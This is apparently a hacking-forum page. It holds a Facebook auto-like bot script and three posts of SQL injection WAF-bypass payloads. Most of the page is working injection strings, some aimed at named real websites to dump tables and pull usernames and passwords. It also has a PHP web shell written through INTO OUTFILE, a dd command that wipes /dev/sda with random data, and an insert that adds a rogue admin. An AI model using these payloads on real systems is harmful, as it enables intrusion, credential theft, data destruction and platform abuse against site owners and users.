How TO Make Facebook Auto Like Script...

Assalamualaikum..

Hello everyone ? How are you today ?
In this time, i will share trick auto like facebook with google script.
This Script working and safe.

Oke Lets Go !!!
Script like this :

PHP Code:

var robot={
SearchLimit:3,
idGroups:[
"",
],
AllTokens:[{name:"YOUR FB NAME",token:"PASTE YOUR TOKEN HERE"}

]
};

//Using Trigger in Function "modeon()" with Timer per-Minute//

function PullBoss(almt,prop){
var a=UrlFetchApp.fetch(almt,{
muteHttpExceptions:true,
method:"post",
payload:prop
});
var b=Utilities.jsonParse(a.getContentText());
return b;
}
function stir(what){
var a=what.sort(function(){return 0.5-Math.random()});
a.reverse();
a=a.sort(function(){return 0.5-Math.random()});
return a;
}
function modeon(){
var a=stir(robot.AllTokens);
if(a[0].token==""){
robot.tokenNow=a[0].apptkn;
}else{
robot.tokenNow=a[0].token;
}
var p=PullBoss("https://graph.facebook.com/me",{
method:"get",
fields:"id",
access_token:robot.tokenNow
});
if(p&&p.id){
robot.uidNow=p.id;
var b=stir(robot.idGroups);
robot.idGroupSekarang=b[0];
var q=PullBoss("https://graph.facebook.com/me/home",{
method:"get",
fields:"id,likes,comments.fields(id,user_likes)",
limit:robot.SearchLimit,
access_token:robot.tokenNow
});
if(q&&q.data&&q.data.length!=0){
for(x in q.data){
var c="y";
var d=q.data[x];
if(d.likes&&d.likes.data&&d.likes.data.length!=0){
for(y in d.likes.data){
if(d.likes.data[y].id&&d.likes.data[y].id==robot.uidNow){
c="n";
break;
}
}
}
if(c=="n"&&d.comments&&d.comments.data&&d.comments.data.length!=0){
for(z in d.comments.data){
if(!d.comments.data[z].user_likes){
var r=PullBoss("https://graph.facebook.com/"+d.comments.data[z].id+"/likes",{
method:"post",
access_token:robot.tokenNow
});
break;
}
}
}
if(c=="y"){
var r=PullBoss("https://graph.facebook.com/"+d.id+"/likes",{
method:"post",
access_token:robot.tokenNow
});
}
}
}
}
}

• Go to site : http://drive.google.com


• follow this instructions :

Oke..... now you have a Robot Auto like
hope this tutorial will helpfull for everyone.

Watch Video..

How To Make FB auto liker Script by anonymousghost420

Hope You all like it

Read more...

All Type of Advance WAF Bypass Part 3…..

Hi all .This the 3rd and last part of the All Type of Advance WAF Bypass …..So lets start hope you enjoy…….

" union select version(),2,3,4,5,6,7--",
"+union+select+version(),2,3,4,5,6,7--",
"\'+union+select+version(),2,3,4,5,6,7--",
"/**/union/**/select/**/version(),2,3,4,5,6,7/**/",
"/*+*/union/*+*/select/*+*/version(),2,3,4,5,6,7/*+*/",
"/**/union/**/select/**/all/*!50000select*/version(),2,3,4,5,6,7/**/",
"%20and%20%28select%201%29%20=%20%28select%202%29%20union%20all%20select%20version

%28%29%206%207%202%203--",
"+and (select 1) = (select 2) union all select version(),2,3,4,5,6,7--",
"%20and%20%28select%201%29%20=%20%28select%200x414141414141414141414141414141414141414141414141414

1414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

14141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

1414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

141414141414141414141414141414141%29%20union%20all%20select%20

version%28%29%206%207%202%203%204%205%206%207--",
"and (select 1) = (select 0x41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141

41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141

4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

14141414141414141414141414141414141414141414141414141414141414141414141414141414141)

union all select version(),2,3,4,5,6,7--",
"**/uNiOn/**/SElEcT/**/vErSiOn(),2,3,4,5,6,7/**/",
"/**/union/**/select*/version(),2,3,4,5,6,7--",
"/**/union/**/select*/(0x76657273696f6e2829),2,3,4,5,6,7/**/",
"/*!unIOn*/ select version(),2,3,4,5,6,7--",
"/*--*/union/*--*/select/*--*/version(),2,3,4,5,6,7/*--*/",
"%09union%09select%09version(),2,3,4,5,6,7--",
"%0aunion%0aselect%0aversion(),2,3,4,5,6,7--",
"%0dunion%0dselect%0dversion(),2,3,4,5,6,7--",
" union select \@\@version,7,2,3,4,5,6,7--",
"+union+select+\@\@version,7,2,3,4,5,6,7--",
"\'+union+select+\@\@version,7,2,3,4,5,6,7--",
"/**/union/**/select/**/\@\@version,7,2,3,4,5,6,7/**/"
"/*+*/union/*+*/select/*+*/\@\@version,7,2,3,4,5,6,7/*+*/"
"/**/union/**/select/**/all/*!50000select*/\@\@version,7,2,3,4,5,6,7/**/"
"%20and%20%28select%201%29%20=%20%28select%202%29%20union%20all%20select%20%40%40

version%206%202%203%204%205%206%207--"

"+and (select 1) = (select 2) union all select \@\@version,7,2,3,4,5,6,7--"
"%20and%20%28select%201%29%20=%20%28select%200x4141414141414141414141414141414141414141414141414

14141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

1414141414141414141414141414141414141%29%20union%20all%20select%20%40%40

version%206%202%203%204%205%206%207--"
"and (select 1) = (select 0x414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

1414141414141414141414141414141414141414141414141414141414141414141414141414141414141414

14141414141414141414141414141414141414141414141414141414141414141414141414141414141414

141414141414141414141414141414141414141414141414141414141414141414141414141414141414

141414141414141414141414141414141414141414141414141414141414141414141414141414141414

1414141414141414141) union all select \@\@version,7,2,3,4,5,6,7--"
"**/uNiOn/**/SElEcT/**/\@\@version,7,2,3,4,5,6,7/**/"
"/**/union/**/select*/\@\@version,7,2,3,4,5,6,7--", "/**/union/**/select*/(0x404076657273696f6e),2,3,4,5,6,7/**/"
"/*!unIOn*/ select \@\@version,7,2,3,4,5,6,7--"
"/*--*/union/*--*/select/*--*/\@\@version,7,2,3,4,5,6,7/*--*/"
"%09union%09select%09%40%40version%206,2,3,4,5,6,7--"
"%0aunion%0aselect%0a%40%40version%206,2,3,4,5,6,7--"
"%0dunion%0dselect%0d%40%40version%206(),2,3,4,5,6,7--"
"+UNion+SeleCT+verSion(),2,3,4,5,6,7--"
"+uUniOn+SeLeCt+veRsion(),2,3,4,5,6,7--"
"+unION+SeLecT+VersiOn(),2,3,4,5,6,7--"
"+UNION+SELECT+VERSION(),2,3,4,5,6,7--"

Note:

All information on this forum is for educational purposes only.

WE are not responsible for any attacks that are carried out on networks, websites or servers.

Read more...

All Type of Advance WAF Bypass Part 2…..

Hi all .This the 2nd part of the All Type of Advance WAF Bypass …..So lets start hope you enjoy.......

SQLI Injction WAF Bypass Methods With Details
--'- : +--+ / : -- - : --+- : /*
) order by 1-- -
') order by 1-- -

')order by 1%23%23

%')order by 1%23%23

Null' order by 100--+

Null' order by 9999--+

')group by 99-- -

'group by 119449-- -

'group/**/by/**/99%23%23

union select ByPassing method

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/

/**//*!50000UNION SELECT*//**/

+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+

+/*!u%6eion*/+/*!se%6cect*/+

/**/uniUNIONon/**/aALLll/**/selSELECTect/**/

1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23

/*!50000%55nIoN*/+/*!50000%53eLeCt*/

union /*!50000%53elect*/

%55nion %53elect

+--+Union+--+Select+--+

+UnIoN/*&a=*/SeLeCT/*&a=*/

id=1+’UnI”On’+'SeL”ECT’

id=1+'UnI'||'on'+SeLeCT'

UnIoN SeLeCt CoNcAt(version())--

uNiOn aLl sElEcT

uUNIONnion all sSELECTelect

=================================================================================
:: Buffer Overflow ::
=================================================================================
+And(select 1)=(select 0×414)+union+select+1–

+And(select 1)=(select 0xAAAA)+union+select+1–

+And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+

+and (/*!select*/ 1)=(/*!select*/ 0xAA)+

===============================================================================
:: 400 Bad Request ::
===============================================================================
–+%0A

union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –

===============================================================================
null the parameter
===============================================================================
id=-1

id=null

id=1+and+false+

id=9999

id=1 and 0

id==1

id=(-1)

===============================================================================
Group_Concat
===============================================================================
Group_Concat

group_concat()

/*!group_concat*/()

grOUp_ConCat(/*!*/,0x3e,/*!*/)

group_concat(,0x3c62723e)

g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29

CoNcAt()

CONCAT(DISTINCT Version())

concat(,0x3a,)

concat%00()

%00CoNcAt()

/*!50000cOnCat*/(/*!Version()*/)

/*!50000cOnCat*/

/**//*!12345cOnCat*/(,0x3a,)

concat_ws()

concat(0x3a,,0x3c62723e)

/*!concat_ws(0x3a,)*/

concat_ws(0x3a3a3a,version()

CONCAT_WS(CHAR(32,58,32),version(),)

REVERSE(tacnoc)

binary(version())

uncompress(compress(version()))

aes_decrypt(aes_encrypt(version(),1),1)

===============================================================================
To appear column numbr in page put after id
===============================================================================
id=1+and+1=0+union+select+1,2,3,4,5,6

+AND+1=0

/*!aND*/ 1 like 0

+/*!and*/+1=0

+and+2>3+

+and(1)=(0)

and (1)!=(0)

+div+0

Having+1=0

================================================================================
function ByPassing
================================================================================
unhex(hex(value))

cast(value as char)

uncompress(compress(version()))

cast(version() as char)

aes_decrypt(aes_encrypt(version(),1),1)

binary(version())

convert(value using ascii)

================================================================================
avoid source page injection
===============================================================================
concat(?”>,

,@@version,?

“>
?

injection

concat(0x223e,@@version)

concat(0x273e27,version(),0x3c212d2d)

concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

concat(0x223e,@@version,0x3c696d67207372633d22)

concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)

concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)

concat(‘’,@@version,’’)

concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)

concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)

===============================================================================
get version – DB_NAME – user – HOST_NAME – datadir
===============================================================================
version()

convert(version() using latin1)

unhex(hex(version()))

@@GLOBAL.VERSION

(substr(@@version,1,1)=5) :: 1 true 0 fals

# like #

http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –

===============================================================================
+and substring(version(),1,1)=4

+and substring(version(),1,1)=5

+and substring(version(),1,1)=9

+and substring(version(),1,1)=10

id=1 /*!50094aaaa*/ error

id=1 /*!50095aaaa*/ no error

id=1 /*!50096aaaa*/ error

# like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/

id=1 /*!40123 1=1*/–+- no error

id=1 /*!40122rrrr*/ no error

# like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
================================================================================
DB_NAME()
===============================================================================
@@database
database()
id=vv()
# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
http://www.marinaplast.com/page.php?id=vv()
@@user
user()
user_name()
system_user()
# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –

HOST_NAME()
@@hostname
@@servername
SERVERPROPERTY()

# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
@@datadir
datadir()
# like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
ASPX
and 1=0/@@version
‘ and 1=0/@@version;–
‘) and 1=@@version–
and 1=0/user;–

Requested method
[DUMP DB in 1 Request]

(select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in

(@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)

(select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
===============================================================================
[DUMP DB in 1 Request improve]
===============================================================================

(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and

(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)

like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
===============================================================================
#2#
===============================================================================
method like DUMP DB in 1 Request
===============================================================================
concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM

information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
like
http://www.mishnetorah.com/shop/details.php?id=-26+union+select+1,2,3,concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
===============================================================================
#3#
===============================================================================
databases

(select+count(schema_name) +from+information_schema.schemata)

# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –

tables
(select+count(table_name) +from+information_schema.tables)
# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –

columns
(select+count(column_name) +from+information_schema.columns)
# like #
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
================================================================================
#4#
==============================================================================
show the table with all her columns

CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))

+FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+

like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
================================================================================
#5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
===============================================================================
feltered requested

# tables #
group_concat(/*!table_name*/)

+/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -

/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
===============================================================================
# columns #
==============================================================================
group_concat(/*!column_name*/)

+/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table

/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table

/*!froM*/ table– -
===============================================================================
#6#
================================================================================
bypass method

(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/

=schEMA())

(select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/

=hex table)

like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/

=schEMA()),4,5 –
===============================================================================
#7#
===============================================================================
bypass method

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)

like
http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–

===============================================================================
[+] Union Select:
===============================================================================
union /*!select*/+
union/**/select/**/
/**/union/**/select/**/
/**/union/*!50000select*/
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/uniUNIONon/**/selSELECTect/**/
/**/uniUNIONon/**/aALLll/**/selSELECTect/**/
/**//*!union*//**//*!select*//**/
/**/UNunionION/**/SELselectECT/**/
/**//*UnIOn*//**//*SEleCt*//**/
/**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
/**/UNunionION/**/all/**/SELselectECT/**/
/**//*UnIOn*//**/all/**//*SEleCt*//**/
/**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
uni
%20union%20/*!select*/%20
union%23aa%0Aselect
union+distinct+select+
union+distinctROW+select+
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
/*!u%6eion*/+/*!se%6cect*/+
1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23
/*!50000%55nIoN*/+/*!50000%53eLeCt*/
union /*!50000%53elect*/
+%2F**/+Union/*!select*/
%55nion %53elect
+–+Union+–+Select+–+
+UnIoN/*&a=*/SeLeCT/*&a=*/
uNiOn aLl sElEcT
uUNIONnion all sSELECTelect
union(select(1),2,3)
union (select 1111,2222,3333)
union (/*!/**/ SeleCT */ 11)
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*–*//*!all*//*–*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
id=1+’UnI”On’+’SeL”ECT’
id=1+’UnI’||’on’+SeLeCT’
union select 1–+%0A,2–+%0A,3–+%0A etc ….
===============================================================================
[+] Buffer overflow:
===============================================================================
+And(select 1)=(select 0×414)+union+select+1–
+And(select 1)=(select 0xAAAA)+union+select+1–
+and (/*!select*/ 1)=(/*!select*/ 0xAA)+
+and (/*!select*/ 1)=(/*!select*/ 0×414)+
+And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+
==============================================================================
[+] Group Concat:
===============================================================================
Group_Concat
group_concat()
/*!group_concat*/()
grOUp_ConCat(/*!*/,0x3e,/*!*/)
group_concat(,0x3c62723e)
g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
CoNcAt()
CONCAT(DISTINCT Version())
concat(,0x3a,)
concat%00()
%00CoNcAt()
/*!50000cOnCat*/(/*!Version()*/)
/*!50000cOnCat*/
/**//*!12345cOnCat*/(,0x3a,)
concat_ws()
concat(0x3a,,0x3c62723e)
/*!concat_ws(0x3a,)*/
concat_ws(0x3a3a3a,version()
CONCAT_WS(CHAR(32,58,32),version(),)
===============================================================================
ERORE BASED
==============================================================================
=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–

Database

21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Table_name

and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Columns

21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

extract date

http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Notice the limit function in the query
A website can have more than 2 two databases, so increase the limit until you find all database names
Example: limit 0,1 or limit 1,1 or limit 2,1
==============================================================================
Differences:
Error Based Query for Database Extraction:
==============================================================================
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Double Query for Database Extraction:

and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1
===============================================================================
WUBI +and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
===============================================================================

Descarci orice linux live, bootezi dupa el si formatezi cu dd+urandom. De acolo nu mai recupereaza NIMENI ceva.
Code: dd if=/dev/urandom of=/dev/sda bs=1M

I’d say using concat(0xY)

Y being ‘’ in hex
union select concat(version,0x3c7363726970743e616c6572742827706833776c27293c2f7363726970743e)

http://zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20version%28%29%29b%20join

%20%28select%20database%28%29%29c%29–+

union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)

=113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–

injection in sql database addd new user
INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

CHALLENGES

Code:
=(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(information_schema.columns)where(table_schema=database())and(table_name=0×7365637572697479))–+-
=12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,

0x3c666f6e7420636f6c6f723d626c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
=/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
=121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
=121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
=121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
===============================================================================
Error Based:
===============================================================================
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–

or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)

from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -

and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

+AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))

+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x

or 1=convert(int,(@@version))-
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
+and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

(42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-
===============================================================================
WAF BYPASS
===============================================================================

=-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())– -

=2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– -

==============================================================================
WUBI – 1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,

0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–

(select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
(select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)

(select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
================================================================================

+and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
===============================================================================

test

http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+

…………………………………..
http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

SELECT “ system($_REQUEST['cmd']); ?>”
INTO OUTFILE “full/path/here/cmd.php”

Note:

All information on this forum is for educational purposes only.

WE are not responsible for any attacks that are carried out on networks, websites or servers.

Read more...

All Type of Advance WAF Bypass Part 1.....

Today i will share u a very awesome tutorial that is All Type of Advance WAF Bypass.......So lets start...hope you all like it..

------------------------------Best Bypass WAF------------------------------------

[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]
/*!00000Union*/ /*!00000Select*/
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion %53elect
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+ #?uNiOn + #?sEleCt
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
